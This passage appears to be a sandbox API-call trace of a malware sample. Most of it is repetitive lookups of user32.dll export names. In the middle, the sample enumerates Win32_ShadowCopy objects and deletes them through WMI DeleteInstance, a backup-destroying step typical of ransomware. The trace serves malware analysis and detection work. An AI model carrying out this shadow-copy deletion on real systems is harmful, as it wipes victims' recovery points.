(lpString="DRAWTEXTA") returned 9 [0053.581] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawTextExA" | out: lpString1="DrawTextExA") returned="DrawTextExA" [0053.581] lstrlenA (lpString="DRAWTEXTEXA") returned 11 [0053.581] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawTextExW" | out: lpString1="DrawTextExW") returned="DrawTextExW" [0053.582] lstrlenA (lpString="DRAWTEXTEXW") returned 11 [0053.582] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawTextW" | out: lpString1="DrawTextW") returned="DrawTextW" [0053.582] lstrlenA (lpString="DRAWTEXTW") returned 9 [0053.582] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DwmGetDxSharedSurface" | out: lpString1="DwmGetDxSharedSurface") returned="DwmGetDxSharedSurface" [0053.582] lstrlenA (lpString="DWMGETDXSHAREDSURFACE") returned 21 [0053.582] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DwmStartRedirection" | out: lpString1="DwmStartRedirection") returned="DwmStartRedirection" [0053.582] lstrlenA (lpString="DWMSTARTREDIRECTION") returned 19 [0053.582] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DwmStopRedirection" | out: lpString1="DwmStopRedirection") returned="DwmStopRedirection" [0053.582] lstrlenA (lpString="DWMSTOPREDIRECTION") returned 18 [0053.582] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EditWndProc" | out: lpString1="EditWndProc") returned="EditWndProc" [0053.582] lstrlenA (lpString="EDITWNDPROC") returned 11 [0053.582] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EmptyClipboard" | out: lpString1="EmptyClipboard") returned="EmptyClipboard" [0053.582] lstrlenA (lpString="EMPTYCLIPBOARD") returned 14 [0053.582] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnableMenuItem" | out: lpString1="EnableMenuItem") returned="EnableMenuItem" [0053.582] lstrlenA (lpString="ENABLEMENUITEM") returned 14 [0053.582] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnableScrollBar" | out: lpString1="EnableScrollBar") returned="EnableScrollBar" [0053.582] lstrlenA (lpString="ENABLESCROLLBAR") returned 15 [0053.582] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnableWindow" | out: lpString1="EnableWindow") returned="EnableWindow" [0053.582] lstrlenA (lpString="ENABLEWINDOW") returned 12 [0053.582] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EndDeferWindowPos" | out: lpString1="EndDeferWindowPos") returned="EndDeferWindowPos" [0053.582] lstrlenA (lpString="ENDDEFERWINDOWPOS") returned 17 [0053.582] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EndDialog" | out: lpString1="EndDialog") returned="EndDialog" [0053.582] lstrlenA (lpString="ENDDIALOG") returned 9 [0053.582] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EndMenu" | out: lpString1="EndMenu") returned="EndMenu" [0053.582] lstrlenA (lpString="ENDMENU") returned 7 [0053.582] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EndPaint" | out: lpString1="EndPaint") returned="EndPaint" [0053.582] lstrlenA (lpString="ENDPAINT") returned 8 [0053.582] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EndTask" | out: lpString1="EndTask") returned="EndTask" [0053.582] lstrlenA (lpString="ENDTASK") returned 7 [0053.582] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnterReaderModeHelper" | out: lpString1="EnterReaderModeHelper") returned="EnterReaderModeHelper" [0053.582] lstrlenA (lpString="ENTERREADERMODEHELPER") returned 21 [0053.582] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumChildWindows" | out: lpString1="EnumChildWindows") returned="EnumChildWindows" [0053.582] lstrlenA (lpString="ENUMCHILDWINDOWS") returned 16 [0053.582] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumClipboardFormats" | out: lpString1="EnumClipboardFormats") returned="EnumClipboardFormats" [0053.583] lstrlenA (lpString="ENUMCLIPBOARDFORMATS") returned 20 [0053.583] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumDesktopWindows" | out: lpString1="EnumDesktopWindows") returned="EnumDesktopWindows" [0053.583] lstrlenA (lpString="ENUMDESKTOPWINDOWS") returned 18 [0053.583] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumDesktopsA" | out: lpString1="EnumDesktopsA") returned="EnumDesktopsA" [0053.583] lstrlenA (lpString="ENUMDESKTOPSA") returned 13 [0053.583] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumDesktopsW" | out: lpString1="EnumDesktopsW") returned="EnumDesktopsW" [0053.583] lstrlenA (lpString="ENUMDESKTOPSW") returned 13 [0053.583] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumDisplayDevicesA" | out: lpString1="EnumDisplayDevicesA") returned="EnumDisplayDevicesA" [0053.583] lstrlenA (lpString="ENUMDISPLAYDEVICESA") returned 19 [0053.583] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumDisplayDevicesW" | out: lpString1="EnumDisplayDevicesW") returned="EnumDisplayDevicesW" [0053.583] lstrlenA (lpString="ENUMDISPLAYDEVICESW") returned 19 [0053.583] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumDisplayMonitors" | out: lpString1="EnumDisplayMonitors") returned="EnumDisplayMonitors" [0053.583] lstrlenA (lpString="ENUMDISPLAYMONITORS") returned 19 [0053.583] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumDisplaySettingsA" | out: lpString1="EnumDisplaySettingsA") returned="EnumDisplaySettingsA" [0053.583] lstrlenA (lpString="ENUMDISPLAYSETTINGSA") returned 20 [0053.583] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumDisplaySettingsExA" | out: lpString1="EnumDisplaySettingsExA") returned="EnumDisplaySettingsExA" [0053.583] lstrlenA (lpString="ENUMDISPLAYSETTINGSEXA") returned 22 [0053.583] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumDisplaySettingsExW" | out: lpString1="EnumDisplaySettingsExW") returned="EnumDisplaySettingsExW" [0053.583] lstrlenA (lpString="ENUMDISPLAYSETTINGSEXW") returned 22 [0053.583] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumDisplaySettingsW" | out: lpString1="EnumDisplaySettingsW") returned="EnumDisplaySettingsW" [0053.583] lstrlenA (lpString="ENUMDISPLAYSETTINGSW") returned 20 [0053.583] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumPropsA" | out: lpString1="EnumPropsA") returned="EnumPropsA" [0053.583] lstrlenA (lpString="ENUMPROPSA") returned 10 [0053.583] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumPropsExA" | out: lpString1="EnumPropsExA") returned="EnumPropsExA" [0053.583] lstrlenA (lpString="ENUMPROPSEXA") returned 12 [0053.583] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumPropsExW" | out: lpString1="EnumPropsExW") returned="EnumPropsExW" [0053.583] lstrlenA (lpString="ENUMPROPSEXW") returned 12 [0053.583] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumPropsW" | out: lpString1="EnumPropsW") returned="EnumPropsW" [0053.583] lstrlenA (lpString="ENUMPROPSW") returned 10 [0053.583] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumThreadWindows" | out: lpString1="EnumThreadWindows") returned="EnumThreadWindows" [0053.583] lstrlenA (lpString="ENUMTHREADWINDOWS") returned 17 [0053.583] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumWindowStationsA" | out: lpString1="EnumWindowStationsA") returned="EnumWindowStationsA" [0053.583] lstrlenA (lpString="ENUMWINDOWSTATIONSA") returned 19 [0053.583] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumWindowStationsW" | out: lpString1="EnumWindowStationsW") returned="EnumWindowStationsW" [0053.583] lstrlenA (lpString="ENUMWINDOWSTATIONSW") returned 19 [0053.583] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EnumWindows" | out: lpString1="EnumWindows") returned="EnumWindows" [0053.583] lstrlenA (lpString="ENUMWINDOWS") returned 11 [0053.583] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="EqualRect" | out: lpString1="EqualRect") returned="EqualRect" [0053.584] lstrlenA (lpString="EQUALRECT") returned 9 [0053.584] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ExcludeUpdateRgn" | out: lpString1="ExcludeUpdateRgn") returned="ExcludeUpdateRgn" [0053.584] lstrlenA (lpString="EXCLUDEUPDATERGN") returned 16 [0053.584] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ExitWindowsEx" | out: lpString1="ExitWindowsEx") returned="ExitWindowsEx" [0053.584] lstrlenA (lpString="EXITWINDOWSEX") returned 13 [0053.584] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="FillRect" | out: lpString1="FillRect") returned="FillRect" [0053.584] lstrlenA (lpString="FILLRECT") returned 8 [0053.584] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="FindWindowA" | out: lpString1="FindWindowA") returned="FindWindowA" [0053.584] lstrlenA (lpString="FINDWINDOWA") returned 11 [0053.584] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="FindWindowExA" | out: lpString1="FindWindowExA") returned="FindWindowExA" [0053.584] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'") returned 60 [0053.586] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0054.998] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0054.998] IUnknown:Release (This=0x31d1c0) returned 0x0 [0054.998] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0055.004] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x61849c, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{43A11862-374F-4B42-8013-C8A59B8690F4}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0055.004] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0055.004] lstrlenW (lpString="{43A11862-374F-4B42-8013-C8A59B8690F4}") returned 38 [0055.004] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0055.004] GetModuleHandleA (lpModuleName="user32.dll") returned 0x74f40000 [0055.005] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ActivateKeyboardLayout" | out: lpString1="ActivateKeyboardLayout") returned="ActivateKeyboardLayout" [0055.005] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="AddClipboardFormatListener" | out: lpString1="AddClipboardFormatListener") returned="AddClipboardFormatListener" [0055.005] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="AdjustWindowRect" | out: lpString1="AdjustWindowRect") returned="AdjustWindowRect" [0055.005] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="AdjustWindowRectEx" | out: lpString1="AdjustWindowRectEx") returned="AdjustWindowRectEx" [0055.005] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="AlignRects" | out: lpString1="AlignRects") returned="AlignRects" [0055.005] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="AllowForegroundActivation" | out: lpString1="AllowForegroundActivation") returned="AllowForegroundActivation" [0055.005] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="AllowSetForegroundWindow" | out: lpString1="AllowSetForegroundWindow") returned="AllowSetForegroundWindow" [0055.005] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="AnimateWindow" | out: lpString1="AnimateWindow") returned="AnimateWindow" [0055.005] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="AnyPopup" | out: lpString1="AnyPopup") returned="AnyPopup" [0055.005] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="AppendMenuA" | out: lpString1="AppendMenuA") returned="AppendMenuA" [0055.005] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="AppendMenuW" | out: lpString1="AppendMenuW") returned="AppendMenuW" [0055.005] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ArrangeIconicWindows" | out: lpString1="ArrangeIconicWindows") returned="ArrangeIconicWindows" [0055.005] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="AttachThreadInput" | out: lpString1="AttachThreadInput") returned="AttachThreadInput" [0055.005] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="BeginDeferWindowPos" | out: lpString1="BeginDeferWindowPos") returned="BeginDeferWindowPos" [0055.005] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="BeginPaint" | out: lpString1="BeginPaint") returned="BeginPaint" [0055.005] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="BlockInput" | out: lpString1="BlockInput") returned="BlockInput" [0055.005] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="BringWindowToTop" | out: lpString1="BringWindowToTop") returned="BringWindowToTop" [0055.005] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="BroadcastSystemMessage" | out: lpString1="BroadcastSystemMessage") returned="BroadcastSystemMessage" [0055.005] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="BroadcastSystemMessageA" | out: lpString1="BroadcastSystemMessageA") returned="BroadcastSystemMessageA" [0055.005] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="BroadcastSystemMessageExA" | out: lpString1="BroadcastSystemMessageExA") returned="BroadcastSystemMessageExA" [0055.005] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="BroadcastSystemMessageExW" | out: lpString1="BroadcastSystemMessageExW") returned="BroadcastSystemMessageExW" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="BroadcastSystemMessageW" | out: lpString1="BroadcastSystemMessageW") returned="BroadcastSystemMessageW" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="BuildReasonArray" | out: lpString1="BuildReasonArray") returned="BuildReasonArray" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CalcMenuBar" | out: lpString1="CalcMenuBar") returned="CalcMenuBar" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CalculatePopupWindowPosition" | out: lpString1="CalculatePopupWindowPosition") returned="CalculatePopupWindowPosition" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CallMsgFilter" | out: lpString1="CallMsgFilter") returned="CallMsgFilter" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CallMsgFilterA" | out: lpString1="CallMsgFilterA") returned="CallMsgFilterA" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CallMsgFilterW" | out: lpString1="CallMsgFilterW") returned="CallMsgFilterW" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CallNextHookEx" | out: lpString1="CallNextHookEx") returned="CallNextHookEx" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CallWindowProcA" | out: lpString1="CallWindowProcA") returned="CallWindowProcA" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CallWindowProcW" | out: lpString1="CallWindowProcW") returned="CallWindowProcW" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CancelShutdown" | out: lpString1="CancelShutdown") returned="CancelShutdown" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CascadeChildWindows" | out: lpString1="CascadeChildWindows") returned="CascadeChildWindows" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CascadeWindows" | out: lpString1="CascadeWindows") returned="CascadeWindows" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ChangeClipboardChain" | out: lpString1="ChangeClipboardChain") returned="ChangeClipboardChain" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ChangeDisplaySettingsA" | out: lpString1="ChangeDisplaySettingsA") returned="ChangeDisplaySettingsA" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ChangeDisplaySettingsExA" | out: lpString1="ChangeDisplaySettingsExA") returned="ChangeDisplaySettingsExA" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ChangeDisplaySettingsExW" | out: lpString1="ChangeDisplaySettingsExW") returned="ChangeDisplaySettingsExW" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ChangeDisplaySettingsW" | out: lpString1="ChangeDisplaySettingsW") returned="ChangeDisplaySettingsW" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ChangeMenuA" | out: lpString1="ChangeMenuA") returned="ChangeMenuA" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ChangeMenuW" | out: lpString1="ChangeMenuW") returned="ChangeMenuW" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ChangeWindowMessageFilter" | out: lpString1="ChangeWindowMessageFilter") returned="ChangeWindowMessageFilter" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ChangeWindowMessageFilterEx" | out: lpString1="ChangeWindowMessageFilterEx") returned="ChangeWindowMessageFilterEx" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharLowerA" | out: lpString1="CharLowerA") returned="CharLowerA" [0055.006] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharLowerBuffA" | out: lpString1="CharLowerBuffA") returned="CharLowerBuffA" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharLowerBuffW" | out: lpString1="CharLowerBuffW") returned="CharLowerBuffW" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharLowerW" | out: lpString1="CharLowerW") returned="CharLowerW" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharNextA" | out: lpString1="CharNextA") returned="CharNextA" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharNextExA" | out: lpString1="CharNextExA") returned="CharNextExA" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharNextW" | out: lpString1="CharNextW") returned="CharNextW" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharPrevA" | out: lpString1="CharPrevA") returned="CharPrevA" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharPrevExA" | out: lpString1="CharPrevExA") returned="CharPrevExA" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharPrevW" | out: lpString1="CharPrevW") returned="CharPrevW" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharToOemA" | out: lpString1="CharToOemA") returned="CharToOemA" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharToOemBuffA" | out: lpString1="CharToOemBuffA") returned="CharToOemBuffA" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharToOemBuffW" | out: lpString1="CharToOemBuffW") returned="CharToOemBuffW" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharToOemW" | out: lpString1="CharToOemW") returned="CharToOemW" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharUpperA" | out: lpString1="CharUpperA") returned="CharUpperA" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharUpperBuffA" | out: lpString1="CharUpperBuffA") returned="CharUpperBuffA" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharUpperBuffW" | out: lpString1="CharUpperBuffW") returned="CharUpperBuffW" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CharUpperW" | out: lpString1="CharUpperW") returned="CharUpperW" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CheckDesktopByThreadId" | out: lpString1="CheckDesktopByThreadId") returned="CheckDesktopByThreadId" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CheckDlgButton" | out: lpString1="CheckDlgButton") returned="CheckDlgButton" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CheckMenuItem" | out: lpString1="CheckMenuItem") returned="CheckMenuItem" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CheckMenuRadioItem" | out: lpString1="CheckMenuRadioItem") returned="CheckMenuRadioItem" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CheckRadioButton" | out: lpString1="CheckRadioButton") returned="CheckRadioButton" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CheckWindowThreadDesktop" | out: lpString1="CheckWindowThreadDesktop") returned="CheckWindowThreadDesktop" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ChildWindowFromPoint" | out: lpString1="ChildWindowFromPoint") returned="ChildWindowFromPoint" [0055.007] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ChildWindowFromPointEx" | out: lpString1="ChildWindowFromPointEx") returned="ChildWindowFromPointEx" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CliImmSetHotKey" | out: lpString1="CliImmSetHotKey") returned="CliImmSetHotKey" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ClientThreadSetup" | out: lpString1="ClientThreadSetup") returned="ClientThreadSetup" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ClientToScreen" | out: lpString1="ClientToScreen") returned="ClientToScreen" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ClipCursor" | out: lpString1="ClipCursor") returned="ClipCursor" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CloseClipboard" | out: lpString1="CloseClipboard") returned="CloseClipboard" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CloseDesktop" | out: lpString1="CloseDesktop") returned="CloseDesktop" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CloseGestureInfoHandle" | out: lpString1="CloseGestureInfoHandle") returned="CloseGestureInfoHandle" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CloseTouchInputHandle" | out: lpString1="CloseTouchInputHandle") returned="CloseTouchInputHandle" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CloseWindow" | out: lpString1="CloseWindow") returned="CloseWindow" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CloseWindowStation" | out: lpString1="CloseWindowStation") returned="CloseWindowStation" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ConsoleControl" | out: lpString1="ConsoleControl") returned="ConsoleControl" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ControlMagnification" | out: lpString1="ControlMagnification") returned="ControlMagnification" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CopyAcceleratorTableA" | out: lpString1="CopyAcceleratorTableA") returned="CopyAcceleratorTableA" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CopyAcceleratorTableW" | out: lpString1="CopyAcceleratorTableW") returned="CopyAcceleratorTableW" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CopyIcon" | out: lpString1="CopyIcon") returned="CopyIcon" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CopyImage" | out: lpString1="CopyImage") returned="CopyImage" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CopyRect" | out: lpString1="CopyRect") returned="CopyRect" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CountClipboardFormats" | out: lpString1="CountClipboardFormats") returned="CountClipboardFormats" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateAcceleratorTableA" | out: lpString1="CreateAcceleratorTableA") returned="CreateAcceleratorTableA" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateAcceleratorTableW" | out: lpString1="CreateAcceleratorTableW") returned="CreateAcceleratorTableW" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateCaret" | out: lpString1="CreateCaret") returned="CreateCaret" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateCursor" | out: lpString1="CreateCursor") returned="CreateCursor" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateDesktopA" | out: lpString1="CreateDesktopA") returned="CreateDesktopA" [0055.008] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateDesktopExA" | out: lpString1="CreateDesktopExA") returned="CreateDesktopExA" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateDesktopExW" | out: lpString1="CreateDesktopExW") returned="CreateDesktopExW" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateDesktopW" | out: lpString1="CreateDesktopW") returned="CreateDesktopW" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateDialogIndirectParamA" | out: lpString1="CreateDialogIndirectParamA") returned="CreateDialogIndirectParamA" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateDialogIndirectParamAorW" | out: lpString1="CreateDialogIndirectParamAorW") returned="CreateDialogIndirectParamAorW" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateDialogIndirectParamW" | out: lpString1="CreateDialogIndirectParamW") returned="CreateDialogIndirectParamW" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateDialogParamA" | out: lpString1="CreateDialogParamA") returned="CreateDialogParamA" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateDialogParamW" | out: lpString1="CreateDialogParamW") returned="CreateDialogParamW" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateIcon" | out: lpString1="CreateIcon") returned="CreateIcon" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateIconFromResource" | out: lpString1="CreateIconFromResource") returned="CreateIconFromResource" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateIconFromResourceEx" | out: lpString1="CreateIconFromResourceEx") returned="CreateIconFromResourceEx" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateIconIndirect" | out: lpString1="CreateIconIndirect") returned="CreateIconIndirect" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateMDIWindowA" | out: lpString1="CreateMDIWindowA") returned="CreateMDIWindowA" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateMDIWindowW" | out: lpString1="CreateMDIWindowW") returned="CreateMDIWindowW" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateMenu" | out: lpString1="CreateMenu") returned="CreateMenu" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreatePopupMenu" | out: lpString1="CreatePopupMenu") returned="CreatePopupMenu" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateSystemThreads" | out: lpString1="CreateSystemThreads") returned="CreateSystemThreads" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateWindowExA" | out: lpString1="CreateWindowExA") returned="CreateWindowExA" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateWindowExW" | out: lpString1="CreateWindowExW") returned="CreateWindowExW" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateWindowStationA" | out: lpString1="CreateWindowStationA") returned="CreateWindowStationA" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateWindowStationW" | out: lpString1="CreateWindowStationW") returned="CreateWindowStationW" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CsrBroadcastSystemMessageExW" | out: lpString1="CsrBroadcastSystemMessageExW") returned="CsrBroadcastSystemMessageExW" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CtxInitUser32" | out: lpString1="CtxInitUser32") returned="CtxInitUser32" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeAbandonTransaction" | out: lpString1="DdeAbandonTransaction") returned="DdeAbandonTransaction" [0055.009] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeAccessData" | out: lpString1="DdeAccessData") returned="DdeAccessData" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeAddData" | out: lpString1="DdeAddData") returned="DdeAddData" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeClientTransaction" | out: lpString1="DdeClientTransaction") returned="DdeClientTransaction" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeCmpStringHandles" | out: lpString1="DdeCmpStringHandles") returned="DdeCmpStringHandles" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeConnect" | out: lpString1="DdeConnect") returned="DdeConnect" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeConnectList" | out: lpString1="DdeConnectList") returned="DdeConnectList" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeCreateDataHandle" | out: lpString1="DdeCreateDataHandle") returned="DdeCreateDataHandle" [0055.010] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeCreateStringHandleA" | out: lpString1="DdeCreateStringHandleA") 